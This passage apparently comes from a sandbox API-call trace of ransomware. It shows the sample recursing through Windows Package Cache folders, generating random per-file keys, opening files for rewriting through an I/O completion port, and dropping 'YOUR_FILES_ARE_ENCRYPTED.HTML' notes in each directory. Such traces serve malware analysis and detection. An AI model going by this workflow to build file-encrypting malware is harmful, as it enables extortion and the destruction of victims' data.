nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0158.506] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.506] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf833b400, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xf833b400, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xf833b400, ftLastWriteTime.dwHighDateTime=0x1ced524, nFileSizeHigh=0x0, 
nFileSizeLow=0xc89b1, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.506] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0158.506] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.506] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.506] lstrlenW (lpString=".cab") returned 4 [0158.506] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.506] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0158.506] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0158.507] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=821681) returned 1 [0158.507] GetProcessHeap () returned 0x270000 [0158.507] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73f0050 [0158.512] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D1") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="13") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="58") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="EA") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="80") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd73e, 
param_2="%02X" | out: param_1="85") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="24") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="D3") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="D6") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="00") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="8A") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="62") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E8") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="73") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="9B") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="52") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="9E") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="74") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="AC") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="1D") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="85") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="57") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="AD") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="9C") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7D") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="DB") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="18") returned 2 [0158.513] wsprintfW 
(in: param_1=0x4ebd796, param_2="%02X" | out: param_1="37") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="BF") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="6C") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="7D") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="65") returned 2 [0158.514] lstrcpyW (in: lpString1=0x7400104, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0158.514] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.514] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73f0050, lpOverlapped=0x73f0050) returned 1 [0158.519] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.519] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0158.519] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.519] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.519] lstrlenW (lpString=".msi") returned 4 [0158.519] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.519] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.519] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.519] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0158.519] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0158.628] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, 
lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0158.630] CloseHandle (hObject=0x4a8) returned 1 [0158.631] GetProcessHeap () returned 0x270000 [0158.632] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.632] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.632] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.632] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0158.632] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.633] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.635] CloseHandle (hObject=0x598) returned 1 [0158.636] GetProcessHeap () returned 0x270000 [0158.637] HeapFree 
(in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0158.637] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.637] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.637] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0158.637] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.638] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.641] CloseHandle (hObject=0x58c) returned 1 [0158.641] GetProcessHeap () returned 0x270000 [0158.642] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0158.642] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, 
ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1780ae70, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0158.642] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 71 [0158.642] GetProcessHeap () returned 0x270000 [0158.642] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0158.642] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0158.642] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*" [0158.642] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1780ae70, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.643] FindNextFileW (in: hFindFile=0x42f3140, 
lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1780ae70, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.643] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1780ae70, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1aaa01f0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0158.643] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0158.643] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.643] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.643] lstrlenW (lpString=".rsm") returned 4 [0158.643] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.643] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17798a50, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0xfc922670, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 
[0158.643] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0158.643] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.643] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0158.643] lstrlenW (lpString=".exe") returned 4 [0158.643] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0158.644] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17798a50, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0xfc922670, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0158.644] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.644] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0158.644] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0158.686] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, 
lpOverlapped=0x0) returned 1 [0158.689] CloseHandle (hObject=0x5a0) returned 1 [0158.690] GetProcessHeap () returned 0x270000 [0158.691] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0158.692] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0158.692] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 82 [0158.692] GetProcessHeap () returned 0x270000 [0158.692] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.695] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0158.695] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*" [0158.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", 
lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.695] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.696] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.696] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 91 [0158.696] GetProcessHeap () returned 0x270000 [0158.696] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0158.697] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: 
lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0158.697] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*" [0158.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.698] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.698] FindNextFileW (in: hFindFile=0x42f3180, 